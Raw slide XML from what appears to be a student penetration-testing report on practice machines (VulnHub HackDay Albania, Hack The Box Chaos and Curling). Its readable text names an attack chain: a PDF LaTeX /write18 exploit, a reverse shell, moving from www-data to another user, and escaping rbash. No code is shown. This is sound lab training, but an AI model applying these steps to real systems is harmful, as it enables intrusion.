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Lst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Montserrat" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId29"/>
      <p:bold r:id="rId30"/>
      <p:italic r:id="rId31"/>
      <p:boldItalic r:id="rId32"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Raleway" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId33"/>
      <p:bold r:id="rId34"/>
      <p:italic r:id="rId35"/>
      <p:boldItalic r:id="rId36"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId37"/>
      <p:bold r:id="rId38"/>
      <p:italic r:id="rId39"/>
      <p:boldItalic r:id="rId40"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Source Sans Pro" panose="020B0503030403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8EDE2D-5140-4CE5-8088-8FD6ECF2DEED}">
  <a:tblStyle styleId="{158EDE2D-5140-4CE5-8088-8FD6ECF2DE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vulnhub.com/entry/hackday-albania,167/"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hackthebox.eu/home/machines/profile/160" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackthebox.eu/home/machines/profile/167"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dovecot.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66a858176_4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66a858176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66a858176_6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66a858176_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66a858176_6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66a858176_6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6a858176_6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66a858176_6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66a858176_6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66a858176_6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66a858176_6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66a858176_6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65fd89d4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65fd89d4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65fd89d4a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65fd89d4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66a858176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66a858176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66a858176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66a85817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65fd89d4a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65fd89d4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Albania: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.vulnhub.com/entry/hackday-albania,167/</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>Chaos:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.hackthebox.eu/home/machines/profile/167</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Curling: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.hackthebox.eu/home/machines/profile/160</a:t>
            </a:r>
            <a:endParaRPr sz="1400">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66a858176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66a858176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65fd89d4a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65fd89d4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65fd89d4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65fd89d4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66a858176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66a858176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65fd89d4a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65fd89d4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65fd89d4a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65fd89d4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66a858176_4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66a858176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65fd89d4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65fd89d4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65fd89d4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65fd89d4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66a858176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66a858176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65fd89d4a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65fd89d4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65fd89d4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65fd89d4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https://www.dovecot.org/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66a85817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66a85817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photos.google.com/search/_cAF1QipNN1RBm3T7YO3Gh9M-r15qoJ8nh1dCMPOw_/photo/AF1QipOD8LF9tHXMkx-Ovjh2dbEVuRenoOlX-HogTKnt"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3"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2243425" y="3556825"/>
            <a:ext cx="1541925" cy="1476150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="86" name="Google Shape;86;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="297550" y="3556825"/>
            <a:ext cx="1541925" cy="1476150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="87" name="Google Shape;87;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="297550" y="0"/>
            <a:ext cx="3487800" cy="3353900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Google Shape;88;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3891625" y="293300"/>
            <a:ext cx="5252400" cy="9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Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Vulnerability Assessment and Penetration Testing Report</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Montserrat"/>
              <a:ea typeface="Montserrat"/>
              <a:cs typeface="Montserrat"/>
              <a:sym typeface="Montserrat"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Google Shape;89;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6638493" y="3471800"/>
            <a:ext cx="33663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highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t>Esaias</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Okupevi</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FF0000"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t>Rohan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Bhangale </a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FF0000"/>
                </a:highlight>
              </a:rPr>
              <a:t>Simi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Ajayi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="16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2"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="214925" y="853775"/>
            <a:ext cx="2571750" cy="1896500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="174" name="Google Shape;174;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3764100" y="853775"/>
            <a:ext cx="5004650" cy="3648075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="Google Shape;175;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3774725" y="155150"/>
            <a:ext cx="35070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Evolution</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176" name="Google Shape;176;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="363450" y="218925"/>
            <a:ext cx="22635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Protected Blog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3"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="1690900"/>
            <a:ext cx="5791200" cy="2867025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Google Shape;182;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="459100" y="176400"/>
            <a:ext cx="6195600" cy="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You’ve Got </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>MAIL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>!</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4"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="381075" y="1345372"/>
            <a:ext cx="8239600" cy="3546350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="Google Shape;188;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="448450" y="612125"/>
            <a:ext cx="4845900" cy="40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00FF"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="Google Shape;189;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5517575" y="612125"/>
            <a:ext cx="30075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/etc/hosts</a:t>
            </a:r>
            <a:endParaRPr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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11" y="2320262"/>
            <a:ext cx="1965300" cy="898500"/>
          </a:xfrm>
          <a:prstGeom prst="homePlate">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4285F4"/>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95" name="Google Shape;195;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2486063"/>
            <a:ext cx="1527900" cy="5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Wireshark</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="196" name="Google Shape;196;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="600329" y="1610562"/>
            <a:ext cx="208785" cy="715593"/>
            <a:chOff x="777447" y="1610215"/>
            <a:chExt cx="198900" cy="593656"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="197" name="Google Shape;197;p25"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="876909" y="1649171"/>
              <a:ext cx="0" cy="554700"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="424242"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="198" name="Google Shape;198;p25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="777447" y="1610215"/>
              <a:ext cx="198900" cy="198900"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:pr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25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1527902" y="2320262"/>
            <a:ext cx="2152800" cy="898500"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4285F4"/>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00" name="Google Shape;200;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1216399" y="2486075"/>
            <a:ext cx="2200200" cy="567000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>PDF LaTex /write18 Exploit</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="201" name="Google Shape;201;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2021063" y="3212228"/>
            <a:ext cx="208785" cy="715593"/>
            <a:chOff x="2223534" y="2938958"/>
            <a:chExt cx="198900" cy="593656"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="202" name="Google Shape;202;p25"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="2322997" y="2938958"/>
              <a:ext cx="0" cy="554700"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="424242"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="203" name="Google Shape;203;p25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="2223534" y="3333714"/>
              <a:ext cx="198900" cy="198900"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:pr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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3286520" y="2320262"/>
            <a:ext cx="2152800" cy="898500"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4285F4"/>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05" name="Google Shape;205;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3596988" y="2486063"/>
            <a:ext cx="1380900" cy="5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Reverse Shell</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="206" name="Google Shape;206;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3902593" y="1610562"/>
            <a:ext cx="208785" cy="715593"/>
            <a:chOff x="3918084" y="1610215"/>
            <a:chExt cx="198900" cy="593656"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="207" name="Google Shape;207;p25"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4017546" y="1649171"/>
              <a:ext cx="0" cy="554700"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="424242"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="208" name="Google Shape;208;p25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3918084" y="1610215"/>
              <a:ext cx="198900" cy="198900"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:pr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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5023613" y="2320262"/>
            <a:ext cx="2152800" cy="898500"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4285F4"/>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10" name="Google Shape;210;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5351897" y="2486063"/>
            <a:ext cx="1380900" cy="5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 www-data to Another User</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="211" name="Google Shape;211;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5912079" y="3212228"/>
            <a:ext cx="208785" cy="715593"/>
            <a:chOff x="5958946" y="2938958"/>
            <a:chExt cx="198900" cy="593656"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="212" name="Google Shape;212;p25"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="6058409" y="2938958"/>
              <a:ext cx="0" cy="554700"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="424242"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="213" name="Google Shape;213;p25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="5958946" y="3333714"/>
              <a:ext cx="198900" cy="198900"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:pr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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6760707" y="2320262"/>
            <a:ext cx="2152800" cy="898500"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4285F4"/>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15" name="Google Shape;215;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106776" y="2486063"/>
            <a:ext cx="1380900" cy="5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Escaping rbash</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="216" name="Google Shape;216;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7692973" y="1610562"/>
            <a:ext cx="208785" cy="715593"/>
            <a:chOff x="3918084" y="1610215"/>
            <a:chExt cx="198900" cy="593656"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="217" name="Google Shape;217;p25"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4017546" y="1649171"/>
              <a:ext cx="0" cy="554700"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="424242"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="218" name="Google Shape;218;p25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3918084" y="1610215"/>
              <a:ext cx="198900" cy="198900"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:pr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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="664075" y="3619575"/>
            <a:ext cx="2030700" cy="9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BLACKLISTED commands used. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
